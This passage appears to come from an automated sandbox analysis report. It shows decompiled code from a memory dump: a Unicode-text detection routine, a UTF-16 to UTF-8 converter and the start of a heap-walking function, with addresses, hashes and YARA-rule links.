				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x1e496d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x1e496920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x1e496920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x1e3a1174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M1E3A1160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}

0x1e3a0d2b
0x1e3a0d2e
0x1e3a0d32
0x1e3a0d39
0x1e3a0d3b
0x1e3a0d3d
0x1e3a0d3f
0x1e3a0d46
0x1e3a0d4d
0x1e3a0d54
0x1e3a0d5b
0x1e3a0d62
0x1e3a0d69
0x1e3a0d70
0x1e3a0d77
0x1e3a0d7e
0x1e3a0d85
0x1e3a0d88
0x1e3a0d8b
0x1e3a0d8e
0x1e3a0d91
0x1e3a0d94
0x1e3a0d97
0x1e3a0d9a
0x1e3a0d9d
0x1e3a0da6
0x1e3a10e9
0x1e3a10ee
0x1e3a0db9
0x1e3a0db9
0x1e3a0dbc
0x1e3fe9c7
0x1e3fe9ca
0x1e3fe9cd
0x1e3fe9d0
0x1e3fe9dd
0x1e3fe9dd
0x1e3a0dec
0x1e3a0dec
0x1e3a0dee
0x1e3a0df3
0x1e3a0ebf
0x1e3a0ec0
0x00000000
0x1e3a0df9
0x1e3a0df9
0x1e3a0e1e
0x1e3a0e21
0x1e3a0e24
0x1e3a0e27
0x1e3a0e2a
0x1e3a0e2d
0x1e3a0e30
0x1e3a0e36
0x1e3a1040
0x1e3a1043
0x1e3a1049
0x1e3a1049
0x1e3a0e3c
0x1e3a0e3f
0x1e3a1007
0x1e3a100a
0x1e3a1010
0x1e3a1010
0x1e3a100a
0x1e3a0e3f
0x1e3a0e58
0x1e3a0e5d
0x1e3a1000
0x1e3a0e63
0x1e3a0e63
0x1e3a0e63
0x1e3a0e67
0x1e3a0e69
0x1e3a0e69
0x1e3a0e6d
0x1e3a0e70
0x1e3a0e74
0x1e3a0e76
0x1e3a0e76
0x1e3a0e7a
0x1e3a0e7c
0x1e3a0e7c
0x1e3a0e83
0x1e3a0e86
0x1e3a0e87
0x1e3a0e89
0x1e3a0e8b
0x1e3a0e91
0x1e3a0e00
0x1e3a0e03
0x1e3a0e03
0x1e3a0e07
0x1e3a0e0f
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3a0e0f
0x1e3a0e97
0x1e3a0e9c
0x1e3a113e
0x1e3a1141
0x1e3a1143
0x1e3a0eb1
0x1e3a0eb1
0x1e3a0eb4
0x1e3a0eb6
0x1e3a1110
0x1e3a1112
0x1e3fea25
0x1e3fea25
0x1e3a0ec3
0x1e3a0ec3
0x1e3a0ecb
0x1e3a10fe
0x1e3a0ed1
0x1e3a0ed1
0x1e3a0ed1
0x1e3a0ed3
0x1e3a0edb
0x1e3fea2d
0x1e3fea2f
0x1e3fea31
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3fea37
0x1e3fea37
0x1e3fea3a
0x1e3fea3e
0x1e3fea47
0x1e3fea4a
0x1e3fea4c
0x1e3fea4d
0x1e3fea4d
0x1e3fea4e
0x1e3fea4e
0x1e3fea51
0x1e3fea52
0x1e3fea52
0x00000000
0x1e3a0ee1
0x1e3a0ee1
0x1e3a0ee1
0x1e3a0ee3
0x1e3a0ee3
0x1e3a0ee6
0x1e3a0eec
0x1e3fea5b
0x1e3fea5d
0x1e3a0ef6
0x1e3a0ef8
0x1e3fea6f
0x1e3fea6f
0x1e3a0efe
0x1e3a0efe
0x1e3a0f03
0x1e3fea7b
0x1e3fea7d
0x00000000
0x00000000
0x1e3fea83
0x1e3fea85
0x00000000
0x00000000
0x1e3fea8b
0x1e3fea91
0x00000000
0x00000000
0x1e3fea97
0x1e3fea9a
0x1e3feaa0
0x1e3feaa2
0x1e3feaa2
0x1e3feaae
0x1e3feab3
0x1e3feab6
0x1e3feabf
0x1e3feaca
0x1e3feacd
0x1e3fead1
0x1e3fead1
0x1e3feab8
0x1e3feab8
0x1e3feab8
0x1e3fead2
0x1e3fead9
0x1e3a0f0e
0x1e3a0f15
0x1e3a0f17
0x1e3a0f17
0x1e3a0f1e
0x1e3a0f23
0x1e3feae1
0x1e3feae1
0x1e3a0f38
0x1e3a0f3a
0x1e3a0f3a
0x1e3a0f49
0x1e3a1108
0x1e3a1108
0x1e3a0f5b
0x1e3a10c7
0x1e3a10ca
0x1e3a10cc
0x00000000
0x00000000
0x1e3a10dc
0x1e3a10de
0x00000000
0x00000000
0x00000000
0x1e3a0f61
0x1e3a0f61
0x1e3a0f61
0x1e3a0f67
0x1e3a0f6b
0x1e3a111d
0x1e3a111d
0x1e3a0f75
0x1e3a0f77
0x1e3a0f77
0x1e3a0f85
0x1e3a0f8b
0x1e3a10b9
0x1e3a10bc
0x1e3feae9
0x1e3feae9
0x1e3a0f91
0x1e3a0f91
0x1e3a0f91
0x1e3a0f96
0x1e3a0f98
0x1e3a0f9a
0x1e3a0f9a
0x1e3a0fa6
0x1e3a107c
0x1e3a107f
0x1e3a108d
0x00000000
0x1e3a108d
0x1e3a1081
0x1e3a1087
0x1e3feaf4
0x1e3feafa
0x00000000
0x00000000
0x00000000
0x1e3feb00
0x00000000
0x1e3a0fac
0x1e3a0fac
0x00000000
0x1e3a0fac
0x1e3a0fa6
0x1e3a0f5b
0x1e3a0f09
0x1e3a0f09
0x00000000
0x1e3a0f09
0x1e3fea63
0x00000000
0x1e3fea63
0x1e3a0ef4
0x00000000
0x00000000
0x00000000
0x1e3a0ef4
0x1e3a0ebc
0x1e3a0ebc
0x00000000
0x1e3a0ebc
0x1e3a0eb6
0x1e3a1149
0x1e3a114c
0x1e3a114d
0x00000000
0x1e3a114d
0x1e3a0ea4
0x1e3a0ea7
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3a0fb7
0x1e3a0fb7
0x1e3a0fbc
0x1e3a0fc9
0x1e3a0fc9
0x1e3a0fce
0x1e3a1020
0x1e3a1025
0x1e3a1094
0x1e3a1094
0x1e3a1099
0x1e3fea04
0x1e3fea04
0x1e3fea09
0x1e3fea1c
0x1e3fea0b
0x1e3fea0b
0x1e3fea0e
0x1e3fea14
0x1e3fea14
0x1e3fea0e
0x1e3fea09
0x1e3a1027
0x1e3a1027
0x1e3a1155
0x1e3a102d
0x1e3a102d
0x1e3a102d
0x1e3a1032
0x1e3fe9fc
0x1e3fe9fc
0x1e3a1032
0x1e3a1027
0x00000000
0x1e3a1025
0x1e3a0fd0
0x1e3fe9f4
0x00000000
0x1e3fe9f4
0x1e3a0fd6
0x1e3a0fd9
0x1e3a1059
0x1e3a1059
0x1e3a105e
0x1e3fe9ec
0x1e3a1064
0x1e3a1064
0x1e3a1064
0x1e3a1069
0x1e3a10ac
0x1e3a106b
0x1e3a106b
0x1e3a106e
0x1e3a1074
0x1e3a1074
0x1e3a106e
0x1e3a1069
0x00000000
0x1e3a105e
0x1e3a0fdb
0x1e3a10a4
0x00000000
0x1e3a10a4
0x1e3a0fe1
0x1e3a0fe4
0x00000000
0x00000000
0x1e3a0fea
0x1e3a0ff1
0x00000000
0x1e3a0ff8
0x00000000
0x00000000
0x1e3fe9e4
0x00000000
0x00000000
0x1e3a1018
0x00000000
0x00000000
0x1e3a1051
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3a0ff1
0x1e3a0fbe
0x1e3a0fc3
0x00000000
0x00000000
0x00000000
0x1e3a0fc3
0x1e3a0df3
0x1e3fe9d5
0x1e3fe9d7
0x1e3a1128
0x1e3a1128
0x1e3a112b
0x1e3a112d
0x1e3a1133
0x1e3a1133
0x00000000
0x1e3a112d
0x00000000
0x1e3fe9d7
0x1e3a0dc2
0x1e3a10f6
0x1e3a0dd4
0x1e3a0dd7
0x1e3a0dda
0x1e3a0de8
0x1e3a0de9
0x1e3a0de9
0x1e3a0dda
0x00000000
0x1e3a0dc2
0x1e3a0dac
0x1e3a0dae
0x1e3a0db3
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66d3f00646f9225503ad99a059ca1b3a192abb00ffb62dae1ac5b5f8f6d3e209
Instruction ID: 88f218f0039f003e96c1d8a2eb9c9e775ce3d876f32cb603a9c7f160fa2be351
Opcode Fuzzy Hash: 66d3f00646f9225503ad99a059ca1b3a192abb00ffb62dae1ac5b5f8f6d3e209
Instruction Fuzzy Hash: 96D18C71E046598BDB08CE9AC5A07AEFBF6EFC4350F108369E642E6285D77889C1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1E3DEBB0, Relevance: .2, Instructions: 250
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1E3DEBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E1E3DED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}

0x1e3debb8
0x1e3debbf
0x1e3debc1
0x1e3debc6
0x00000000
0x1e41b6d6
0x1e3debcd
0x1e3debd2
0x1e3dec95
0x1e41b6e0
0x1e3dec9b
0x1e3deca1
0x1e3deca1
0x1e3dec89
0x00000000
0x1e3dec89
0x1e3debd8
0x1e3debdd
0x1e41b6ea
0x00000000
0x1e3debe3
0x1e3debe5
0x1e3debe7
0x1e3debef
0x1e3debf2
0x00000000
0x1e3debf5
0x00000000
0x1e3debf5
0x1e3debf5
0x1e3debf7
0x1e41b6f6
0x1e3dec7c
0x1e3dec7c
0x1e3dec7f
0x1e3dec82
0x1e3dec87
0x00000000
0x1e3dec87
0x1e3dec1a
0x1e3dec1a
0x1e3dec25
0x1e41b725
0x1e41b72c
0x1e41b72c
0x1e3dec2d
0x1e3dec31
0x1e41b73c
0x1e41b744
0x1e41b748
0x1e41b748
0x1e41b749
0x1e41b749
0x1e41b74a
0x1e41b74a
0x1e3dec3e
0x1e41b860
0x00000000
0x1e3dec44
0x1e3dec47
0x1e41b750
0x1e41b758
0x1e41b767
0x1e41b775
0x1e41b77c
0x1e41b77f
0x1e41b769
0x1e41b76c
0x1e41b76c
0x1e41b781
0x1e41b788
0x1e41b78b
0x1e41b75a
0x1e41b75d
0x1e41b75d
0x1e41b78d
0x1e41b792
0x1e41b793
0x1e41b793
0x1e3dec54
0x1e3dec56
0x1e3dec57
0x1e3dec59
0x1e3dec5e
0x1e3decaa
0x1e3ded16
0x1e3ded16
0x1e3decac
0x1e3decaf
0x1e3decb4
0x1e3decb6
0x1e3decb6
0x1e3decb9
0x1e3decbf
0x1e41b7c1
0x1e41b7c8
0x1e41b7d3
0x1e41b7db
0x1e41b7ec
0x1e41b858
0x00000000
0x1e41b858
0x1e41b7ee
0x1e41b7f1
0x1e41b7f4
0x1e41b7ff
0x1e41b850
0x00000000
0x1e41b850
0x1e41b80a
0x1e41b813
0x1e41b81c
0x1e41b81d
0x1e41b822
0x1e41b825
0x1e41b828
0x1e41b831
0x1e41b832
0x1e41b837
0x1e41b840
0x1e41b842
0x1e41b845
0x1e41b848
0x00000000
0x1e41b848
0x1e41b7df
0x00000000
0x1e41b7df
0x1e41b7cc
0x00000000
0x1e41b7cc
0x1e3decc5
0x1e3decc7
0x1e3deccb
0x1e41b79b
0x1e41b79e
0x1e41b7a4
0x00000000
0x00000000
0x1e41b7a6
0x1e41b7a8
0x1e41b7a8
0x1e3decd3
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3decd5
0x1e3decd5
0x1e3decd5
0x1e3decd8
0x1e3decda
0x1e3dece4
0x00000000
0x00000000
0x1e3decea
0x1e3deced
0x1e3decf0
0x1e3decf2
0x1e3decfb
0x1e3decfe
0x1e3ded01
0x1e3ded06
0x00000000
0x00000000
0x00000000
0x1e3ded06
0x1e41b7ae
0x1e41b7b1
0x1e41b7b7
0x00000000
0x00000000
0x1e41b7b9
0x1e41b7bb
0x1e3ded08
0x1e3ded08
0x1e3ded0c
0x1e3ded0c
0x00000000
0x1e3dec60
0x1e3dec62
0x1e3ded0f
0x1e3ded0f
0x00000000
0x1e3ded0f
0x1e3dec68
0x1e3dec6c
0x1e3dec6f
0x1e3dec75
0x1e3dec0d
0x1e3dec0d
0x1e3dec18
0x00000000
0x00000000
0x00000000
0x1e3dec18
0x1e3dec77
0x1e3dec79
0x1e3dec79
0x00000000
0x1e3dec68
0x1e3dec5e
0x1e3dec3e
0x1e3debfd
0x1e3dec02
0x1e41b701
0x1e41b70c
0x1e41b71b
0x1e41b71d
0x1e41b71d
0x00000000
0x1e41b70c
0x1e3dec08
0x1e3dec0a
0x00000000
0x1e3dec0a
0x1e3debf5
0x1e3debf5

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction ID: 097d4783adac6b5c0d9c765eb96a3231d038b0de44955d8a77c44c8750b91851
Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction Fuzzy Hash: 34812732E08396CFEB114F6AC8C0259BF56FF52600B68477BE9528F741C265B84AD7A1

Uniqueness

Uniqueness Score: -1.00%

Function 1E3CAB40, Relevance: .2, Instructions: 240
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1E3CAB40(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed short _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				intOrPtr _t69;
				intOrPtr* _t70;
				intOrPtr _t71;
				intOrPtr _t73;
				void* _t74;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t88;
				unsigned int _t97;
				unsigned int _t99;
				unsigned int _t105;
				unsigned int _t107;
				intOrPtr* _t111;
				unsigned int _t118;
				void* _t123;
				intOrPtr _t127;
				signed int _t128;
				void* _t131;
				signed char _t136;
				signed char _t141;
				signed char _t146;
				signed int _t151;
				signed int _t153;
				unsigned int _t155;
				intOrPtr _t158;
				void* _t164;
				signed short _t167;
				void* _t171;
				void* _t173;
				intOrPtr* _t175;
				intOrPtr* _t178;
				signed short _t180;
				signed short _t182;

				_t149 = __ecx;
				_t111 =  *((intOrPtr*)(__edx + 0x18));
				_v24 = __edx;
				_t69 =  *((intOrPtr*)(_t111 + 4));
				_t158 = _a12;
				_v8 = __ecx;
				_v16 = _a8 -  *((intOrPtr*)(__edx + 0x14));
				_v28 = _t111;
				if(_t111 == _t69) {
					L7:
					_t70 = _t111;
					goto L8;
				} else {
					_t127 = _a4;
					if(_t127 == 0) {
						_t171 = _t158 -  *((intOrPtr*)(_t69 + 0x14));
					} else {
						_t182 =  *(_t69 - 8);
						_v20 = _t69 + 0xfffffff8;
						if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
